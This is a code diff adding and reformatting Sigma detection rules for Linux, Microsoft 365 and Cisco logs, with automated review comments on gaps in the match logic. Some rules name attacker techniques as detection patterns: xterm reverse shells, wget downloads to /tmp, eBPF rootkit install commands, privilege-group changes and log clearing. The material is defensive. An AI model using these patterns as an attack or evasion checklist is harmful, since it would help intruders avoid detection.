a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml 
@@ -2,32 +2,32 @@ title: System Network Discovery - Linux id: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa status: test description: Detects enumeration of local network configuration -author: Ömer Günal and remotephone, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md +author: Ömer Günal and remotephone, oscd.community date: 2020/10/06 -modified: 2021/11/27 +modified: 2022/09/15 +tags: + - attack.discovery + - attack.t1016 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: - - '/firewall-cmd' - - '/ufw' - - '/iptables' - - '/netstat' - - '/ss' - - '/ip' - - '/ifconfig' - - '/systemd-resolve' - - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: selection1 or selection2 + selection_img: + Image|endswith: + - '/firewall-cmd' + - '/ufw' + - '/iptables' + - '/netstat' + - '/ss' + - '/ip' + - '/ifconfig' + - '/systemd-resolve' + - '/route' + selection_cli: + CommandLine|contains: '/etc/resolv.conf' + condition: 1 of selection_* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: informational -tags: - - attack.discovery - - attack.t1016 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml new file mode 100644 index 000000000..ac6b07c9c --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml 
@@ -0,0 +1,24 @@
+title: Touch Suspicious Service File
+id: 31545105-3444-4584-bebf-c466353230d2
+status: test
+description: Detects usage of the "touch" process in service file.
+references:
+ - https://blogs.blackberry.com/
+ - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/01/11
+tags:
+ - attack.defense_evasion
+ - attack.t1070.006
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|endswith: '/touch'
+ CommandLine|contains: ' -t '
+ CommandLine|endswith: '.service'
+ condition: selection
+falsepositives:
+ - Admin changing date of files.
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
new file mode 100644
index 000000000..31d219dc9
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
@@ -0,0 +1,22 @@
+title: Triple Cross eBPF Rootkit Execve Hijack
+id: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e
+status: test
+description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
+references:
+ - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/05
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/sudo'
+ CommandLine|contains: 'execve_hijack'
+ condition: selection
+falsepositives:
+ - Unlikely
+level: high
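Review bot: `CommandLine|contains: ' -t '` covers only the explicit-timestamp form of `touch`; the `-r` (copy timestamp from a reference file) and `-d` (date string) options change the same mtime on a `.service` file and are not matched. Turning the value into a list, `- ' -t '`, `- ' -r '`, `- ' -d '`, keeps the `.service` anchor and closes the gap. The first reference, `https://blogs.blackberry.com/`, is a bare site root rather than an article and should point at the specific post the rule was derived from.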
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml
new file mode 100644
index 000000000..f7d1534ee
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml
@@ -0,0 +1,27 @@
+title: Triple Cross eBPF Rootkit Install Commands
+id: 22236d75-d5a0-4287-bf06-c93b1770860f
+status: test
+description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
+references:
+ - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/05
+tags:
+ - attack.defense_evasion
+ - attack.t1014
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/sudo'
+ CommandLine|contains|all:
+ - ' tc '
+ - ' enp0s3 '
+ CommandLine|contains:
+ - ' qdisc '
+ - ' filter '
+ condition: selection
+falsepositives:
+ - Unlikely
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml
new file mode 100644
index 000000000..eed85d3c1
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml
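Review bot: `' enp0s3 '` in `CommandLine|contains|all` hard-codes the interface name used by the referenced `deployer.sh`, so the rule only matches installs on hosts where that exact interface exists and misses any deployment where the script's interface variable was edited, while still firing on unrelated `sudo tc qdisc ... enp0s3` administration on VirtualBox-style guests. If the deployer's `tc` invocations carry eBPF-specific arguments (it appears to attach a classifier through `tc qdisc`/`tc filter`; confirm in the reference), keying on those tokens alongside `' tc '` would generalise the rule without widening it to ordinary traffic-control work. The description should also state that the match is tied to the default interface name so operators know why a customised install would be missed.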
@@ -0,0 +1,24 @@
+title: User Has Been Deleted Via Userdel
+id: 08f26069-6f80-474b-8d1f-d971c6fedea0
+status: test
+description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
+references:
+ - https://linuxize.com/post/how-to-delete-group-in-linux/
+ - https://www.cyberciti.biz/faq/linux-remove-user-command/
+ - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/
+ - https://linux.die.net/man/8/userdel
+author: Tuan Le (NCSGroup)
+date: 2022/12/26
+tags:
+ - attack.impact
+ - attack.t1531
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|endswith: '/userdel'
+ condition: selection
+falsepositives:
+ - Legitimate administrator activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml
new file mode 100644
index 000000000..15e18c816
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml
@@ -0,0 +1,25 @@
+title: User Added To Root/Sudoers Group Using Usermod
+id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73
+status: test
+description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
+references:
+ - https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/
+ - https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/
+author: TuanLe (GTSC)
+date: 2022/12/21
+tags:
+ - attack.privilege_escalation
+ - attack.persistence
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|endswith: '/usermod'
+ CommandLine|contains:
+ - '-aG root'
+ - '-aG sudoers'
+ condition: selection
+falsepositives:
+ - Legitimate administrator activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml
index 2d6feee4a..8cf0416cf 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml
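Review bot: `'-aG sudoers'` names a group that does not conventionally exist: `sudoers` is the configuration file, while the groups that actually confer sudo rights are `sudo` (Debian/Ubuntu) and `wheel` (RHEL/Fedora/Arch), so in practice the rule only catches additions to `root`. Replace that entry with `- '-aG sudo'` and `- '-aG wheel'` (the first also still matches a literal `sudoers` group), and since `usermod` accepts the flags in any order, the `-a -G root` and bare `-G root` spellings deserve entries too. The description reads "add users add users to the root or suoders groups"; fix the duplicated phrase and the typo while the file is new.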
@@ -1,42 +1,50 @@ title: Linux Webshell Indicators id: 818f7b24-0fba-4c49-a073-8b755573b9c7 -status: experimental +status: test description: Detects suspicious sub processes of web server processes references: - - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ + - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ + - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2021/10/15 -modified: 2022/06/03 -author: Florian Roth +modified: 2022/12/28 tags: - attack.persistence - attack.t1505.003 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection_general: - ParentImage|endswith: - - '/httpd' - - '/lighttpd' - - '/nginx' - - '/apache2' - - '/node' - - '/caddy' - selection_tomcat: - ParentCommandLine|contains|all: - - '/bin/java' - - 'tomcat' - selection_websphere: # ? just guessing - ParentCommandLine|contains|all: - - '/bin/java' - - 'websphere' - selection_sub_processes: - Image|endswith: - - '/whoami' - - '/ifconfig' - - '/usr/bin/ip' - - '/bin/uname' - condition: selection_sub_processes and ( selection_general or selection_tomcat or selection_websphere) + selection_general: + ParentImage|endswith: + - '/httpd' + - '/lighttpd' + - '/nginx' + - '/apache2' + - '/node' + - '/caddy' + selection_tomcat: + ParentCommandLine|contains|all: + - '/bin/java' + - 'tomcat' + selection_websphere: # ? 
just guessing + ParentCommandLine|contains|all: + - '/bin/java' + - 'websphere' + sub_processes: + Image|endswith: + - '/whoami' + - '/ifconfig' + - '/ip' + - '/bin/uname' + - '/bin/cat' + - '/bin/crontab' + - '/hostname' + - '/iptables' + - '/netstat' + - '/pwd' + - '/route' + condition: 1 of selection_* and sub_processes falsepositives: - - Web applications that invoke Linux command line tools + - Web applications that invoke Linux command line tools level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml new file mode 100644 index 000000000..87af0ce34 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml @@ -0,0 +1,29 @@ +title: Download File To Potentially Suspicious Directory Via Wget +id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4 +status: experimental +description: Detects the use of wget to download content to a suspicious directory +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.command_and_control + - attack.t1105 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/wget' + selection_output: + - CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection + - CommandLine|contains: '--output-document' + selection_path: + CommandLine|contains: '/tmp/' + condition: all of selection_* +falsepositives: + - Unknown +level: medium 
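Review bot: `sub_processes` now adds `/bin/cat`, `/hostname`, `/pwd`, `/netstat` and `/route` to the child-process list while `level` stays `high`; `cat` and `hostname` in particular are routinely spawned by legitimate applications under `node`, `nginx` and Java parents, so the hunk trades precision for coverage without adjusting severity or the single `falsepositives` entry. Either move the noisier children into a separate `medium` rule or expand `falsepositives` with the expected sources so analysts can tune. The `# ? just guessing` comment on `selection_websphere` is carried over unchanged; it should be resolved or reworded to say what was actually verified. The hunk starts on the previous line and covers the whole file.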
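Review bot: `CommandLine|re: '\s-O\s'` requires whitespace after `-O`, so the attached form `-O/tmp/x` that wget accepts for short options is missed, while `'--output-document'` via `contains` already handles the `=` spelling; `'\s-O(\s|/)'` covers both forms without weakening the case-sensitivity the inline comment asks for. `selection_path`'s `CommandLine|contains: '/tmp/'` also matches a `/tmp/` segment inside the download URL rather than the output path, which is a small false-positive source that belongs under `falsepositives` instead of `Unknown`. The `-P` (directory-prefix) option writes into `/tmp/` as well and is not covered by `selection_output`.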
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml
new file mode 100644
index 000000000..85a089c11
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml
@@ -0,0 +1,24 @@
+title: Potential Xterm Reverse Shell
+id: 4e25af4b-246d-44ea-8563-e42aacab006b
+status: test
+description: Detects usage of "xterm" as a potential reverse shell tunnel
+references:
+ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+ - https://www.revshells.com/
+author: '@d4ns4n_'
+date: 2023/04/24
+tags:
+ - attack.execution
+ - attack.t1059
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|contains: 'xterm'
+ CommandLine|contains: '-display'
+ CommandLine|endswith: ':1'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/m365/microsoft365_disabling_mfa.yml b/src/main/resources/rules/m365/microsoft365_disabling_mfa.yml
new file mode 100644
index 000000000..f1516794b
--- /dev/null
+++ b/src/main/resources/rules/m365/microsoft365_disabling_mfa.yml
@@ -0,0 +1,21 @@
+title: Disabling Multi Factor Authentication
+id: 60de9b57-dc4d-48b9-a6a0-b39e0469f876
+status: experimental
+description: Detects disabling of Multi Factor Authentication.
+references:
+ - https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/
+author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
+date: 2023/09/18
+tags:
+ - attack.persistence
+ - attack.t1556
+logsource:
+ service: audit
+ product: m365
+detection:
+ selection:
+ Operation|contains: 'Disable Strong Authentication.'
+ condition: selection
+falsepositives:
+ - Unlikely
+level: high
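Review bot: `CommandLine|endswith: ':1'` pins the rule to a single X display number; the referenced cheat sheets use `:1` as an example, but any `host:N` or `host:N.M` value is valid `-display` syntax, so the suffix is an example-specific anchor rather than a property of the technique. A `CommandLine|re: '-display\s+\S+:\d+'` keeps the `-display` requirement without that brittleness. `Image|contains: 'xterm'` is also broader than the `Image|endswith` form used throughout the other rules in this commit and will match any path with that substring; `endswith: '/xterm'` is the consistent choice.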
diff --git a/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml
new file mode 100644
index 000000000..44c6a4916
--- /dev/null
+++ b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml
@@ -0,0 +1,29 @@
+title: New Federated Domain Added
+id: 58f88172-a73d-442b-94c9-95eaed3cbb36
+related:
+ - id: 42127bdd-9133-474f-a6f1-97b6c08a4339
+ type: similar
+status: experimental
+description: Detects the addition of a new Federated Domain.
+references:
+ - https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/
+ - https://o365blog.com/post/aadbackdoor/
+author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
+date: 2023/09/18
+tags:
+ - attack.persistence
+ - attack.t1136.003
+logsource:
+ service: audit
+ product: m365
+detection:
+ selection_domain:
+ Operation|contains: 'domain'
+ selection_operation:
+ Operation|contains:
+ - 'add'
+ - 'new'
+ condition: all of selection_*
+falsepositives:
+ - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.
+level: medium
diff --git a/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml
new file mode 100644
index 000000000..12563859a
--- /dev/null
+++ b/src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml
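Review bot: `selection_domain` and `selection_operation` match any `Operation` containing `domain` together with `add` or `new`, and nothing ties the match to federation, so ordinary operations such as adding a verified (non-federated) domain will fire and `new` also matches substrings like "renew". The description promises "addition of a new Federated Domain"; either add a federation token (`Operation|contains: 'federat'`) if the audit operation names carry one, or reword the description and `falsepositives` to say this is a generic domain-add detector meant to be triaged together with the related Exchange rule `42127bdd-9133-474f-a6f1-97b6c08a4339`. Confirm the actual operation strings in the referenced Splunk rule before narrowing, since the sibling Exchange rule matches the exact `Add-FederatedDomain` cmdlet and this one is evidently meant to cover the non-Exchange path.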
@@ -0,0 +1,30 @@ +title: New Federated Domain Added - Exchange +id: 42127bdd-9133-474f-a6f1-97b6c08a4339 +related: + - id: 58f88172-a73d-442b-94c9-95eaed3cbb36 + type: similar +status: test +description: Detects the addition of a new Federated Domain. +references: + - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf + - https://us-cert.cisa.gov/ncas/alerts/aa21-008a + - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html + - https://www.sygnia.co/golden-saml-advisory + - https://o365blog.com/post/aadbackdoor/ +author: Splunk Threat Research Team (original rule), '@ionsor (rule)' +date: 2022/02/08 +tags: + - attack.persistence + - attack.t1136.003 +logsource: + service: exchange + product: m365 +detection: + selection: + eventSource: Exchange + eventName: 'Add-FederatedDomain' + status: success + condition: selection +falsepositives: + - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider. +level: medium diff --git a/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml b/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml index 03c2e2309..0e05c502b 100644 --- a/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml +++ b/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml @@ -3,7 +3,7 @@ id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 related: - id: 6897cd82-6664-11ed-9022-0242ac120002 type: similar -status: experimental +status: test description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content references: - https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide 
diff --git a/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml b/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml index 58e939a46..71405590f 100644 --- a/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml +++ b/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml @@ -3,7 +3,7 @@ id: 6897cd82-6664-11ed-9022-0242ac120002 related: - id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 type: similar -status: experimental +status: test description: Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud. references: - https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml index 2b1d1ff0d..e32eba875 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml 
@@ -2,27 +2,23 @@ title: Cisco Clear Logs id: ceb407f6-8277-439b-951f-e4210e3ed956 status: test description: Clear command history in network OS which is used for defense evasion +references: + - https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html + - https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609 author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/05/26 +tags: + - attack.defense_evasion + - attack.t1070.003 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'clear logging' - - 'clear archive' - condition: keywords -fields: - - src - - CmdSet - - User - - Privilege_Level - - Remote_Address + keywords: + - 'clear logging' + - 'clear archive' + condition: keywords falsepositives: - - Legitimate administrators may run these commands + - Legitimate administrators may run these commands level: high -tags: - - attack.defense_evasion - - attack.t1070.003 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml index a3c03bf52..a735063db 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml 
@@ -2,33 +2,30 @@ title: Cisco Collect Data
 id: cd072b25-a418-4f98-8ebc-5093fb38fe1a
 status: test
 description: Collect pertinent data from the configuration files
+references:
+ - https://blog.router-switch.com/2013/11/show-running-config/
+ - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm
+ - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html
 author: Austin Clark
 date: 2019/08/11
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.discovery
+ - attack.credential_access
+ - attack.collection
+ - attack.t1087.001
+ - attack.t1552.001
+ - attack.t1005
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'show running-config'
- - 'show startup-config'
- - 'show archive config'
- - 'more'
- condition: keywords
-fields:
- - src
- - CmdSet
- - User
- - Privilege_Level
- - Remote_Address
+ keywords:
+ - 'show running-config'
+ - 'show startup-config'
+ - 'show archive config'
+ - 'more'
+ condition: keywords
 falsepositives:
- - Commonly run by administrators
+ - Commonly run by administrators
 level: low
-tags:
- - attack.discovery
- - attack.credential_access
- - attack.collection
- - attack.t1087.001
- - attack.t1552.001
- - attack.t1005
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml
index 35510c62e..3485e200e 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml
@@ -2,30 +2,25 @@ title: Cisco Crypto Commands
 id: 1f978c6a-4415-47fb-aca5-736a44d7ca3d
 status: test
 description: Show when private keys are being exported from the device, or when new certificates are installed
+references:
+ - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html
 author: Austin Clark
 date: 2019/08/12
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.credential_access
+ - attack.defense_evasion
+ - attack.t1553.004
+ - attack.t1552.004
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'crypto pki export'
- - 'crypto pki import'
- - 'crypto pki trustpoint'
- condition: keywords
-fields:
- - src
- - CmdSet
- - User
- - Privilege_Level
- - Remote_Address
+ keywords:
+ - 'crypto pki export'
+ - 'crypto pki import'
+ - 'crypto pki trustpoint'
+ condition: keywords
 falsepositives:
- - Not commonly run by administrators. Also whitelist your known good certificates
+ - Not commonly run by administrators. Also whitelist your known good certificates
 level: high
-tags:
- - attack.credential_access
- - attack.defense_evasion
- - attack.t1553.004
- - attack.t1552.004
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml
index d90b34743..06711af29 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml
@@ -2,27 +2,28 @@ title: Cisco Disabling Logging
 id: 9e8f6035-88bf-4a63-96b6-b17c0508257e
 status: test
 description: Turn off logging locally or remote
+references:
+ - https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf
 author: Austin Clark
 date: 2019/08/11
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'no logging'
- - 'no aaa new-model'
- condition: keywords
+ keywords:
+ - 'no logging'
+ - 'no aaa new-model'
+ condition: keywords
 fields:
- - src
- - CmdSet
- - User
- - Privilege_Level
- - Remote_Address
+ - src
+ - CmdSet
+ - User
+ - Privilege_Level
+ - Remote_Address
 falsepositives:
- - Unknown
+ - Unknown
 level: high
-tags:
- - attack.defense_evasion
- - attack.t1562.001
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml
index 21f2741f0..5d6574067 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml
@@ -2,44 +2,39 @@ title: Cisco Discovery
 id: 9705a6a1-6db6-4a16-a987-15b7151e299b
 status: test
 description: Find information about network devices that is not stored in config files
+references:
+ - https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html
 author: Austin Clark
 date: 2019/08/12
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.discovery
+ - attack.t1083
+ - attack.t1201
+ - attack.t1057
+ - attack.t1018
+ - attack.t1082
+ - attack.t1016
+ - attack.t1049
+ - attack.t1033
+ - attack.t1124
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'dir'
- - 'show processes'
- - 'show arp'
- - 'show cdp'
- - 'show version'
- - 'show ip route'
- - 'show ip interface'
- - 'show ip sockets'
- - 'show users'
- - 'show ssh'
- - 'show clock'
- condition: keywords
-fields:
- - src
- - CmdSet
- - User
- - Privilege_Level
- - Remote_Address
+ keywords:
+ - 'dir'
+ - 'show arp'
+ - 'show cdp'
+ - 'show clock'
+ - 'show ip interface'
+ - 'show ip route'
+ - 'show ip sockets'
+ - 'show processes'
+ - 'show ssh'
+ - 'show users'
+ - 'show version'
+ condition: keywords
 falsepositives:
- - Commonly used by administrators for troubleshooting
+ - Commonly used by administrators for troubleshooting
 level: low
-tags:
- - attack.discovery
- - attack.t1083
- - attack.t1201
- - attack.t1057
- - attack.t1018
- - attack.t1082
- - attack.t1016
- - attack.t1049
- - attack.t1033
- - attack.t1124
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml
index bdedcfc76..e2455a3bc 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml
@@ -4,24 +4,23 @@ status: test
 description: Detect a system being shutdown or put into different boot mode
 author: Austin Clark
 date: 2019/08/15
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.impact
+ - attack.t1495
+ - attack.t1529
+ - attack.t1565.001
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'shutdown'
- - 'config-register 0x2100'
- - 'config-register 0x2142'
- condition: keywords
+ keywords:
+ - 'shutdown'
+ - 'config-register 0x2100'
+ - 'config-register 0x2142'
+ condition: keywords
 fields:
- - CmdSet
+ - CmdSet
 falsepositives:
- - Legitimate administrators may run these commands, though rarely.
+ - Legitimate administrators may run these commands, though rarely.
 level: medium
-tags:
- - attack.impact
- - attack.t1495
- - attack.t1529
- - attack.t1565.001
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml
index 4e35a0dd1..beedf9793 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml
@@ -4,25 +4,24 @@ status: test
 description: See what files are being deleted from flash file systems
 author: Austin Clark
 date: 2019/08/12
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.defense_evasion
+ - attack.impact
+ - attack.t1070.004
+ - attack.t1561.001
+ - attack.t1561.002
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'erase'
- - 'delete'
- - 'format'
- condition: keywords
+ keywords:
+ - 'erase'
+ - 'delete'
+ - 'format'
+ condition: keywords
 fields:
- - CmdSet
+ - CmdSet
 falsepositives:
- - Will be used sometimes by admins to clean up local flash space
+ - Will be used sometimes by admins to clean up local flash space
 level: medium
-tags:
- - attack.defense_evasion
- - attack.impact
- - attack.t1070.004
- - attack.t1561.001
- - attack.t1561.002
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml
index bf429a053..ccd20f84a 100644
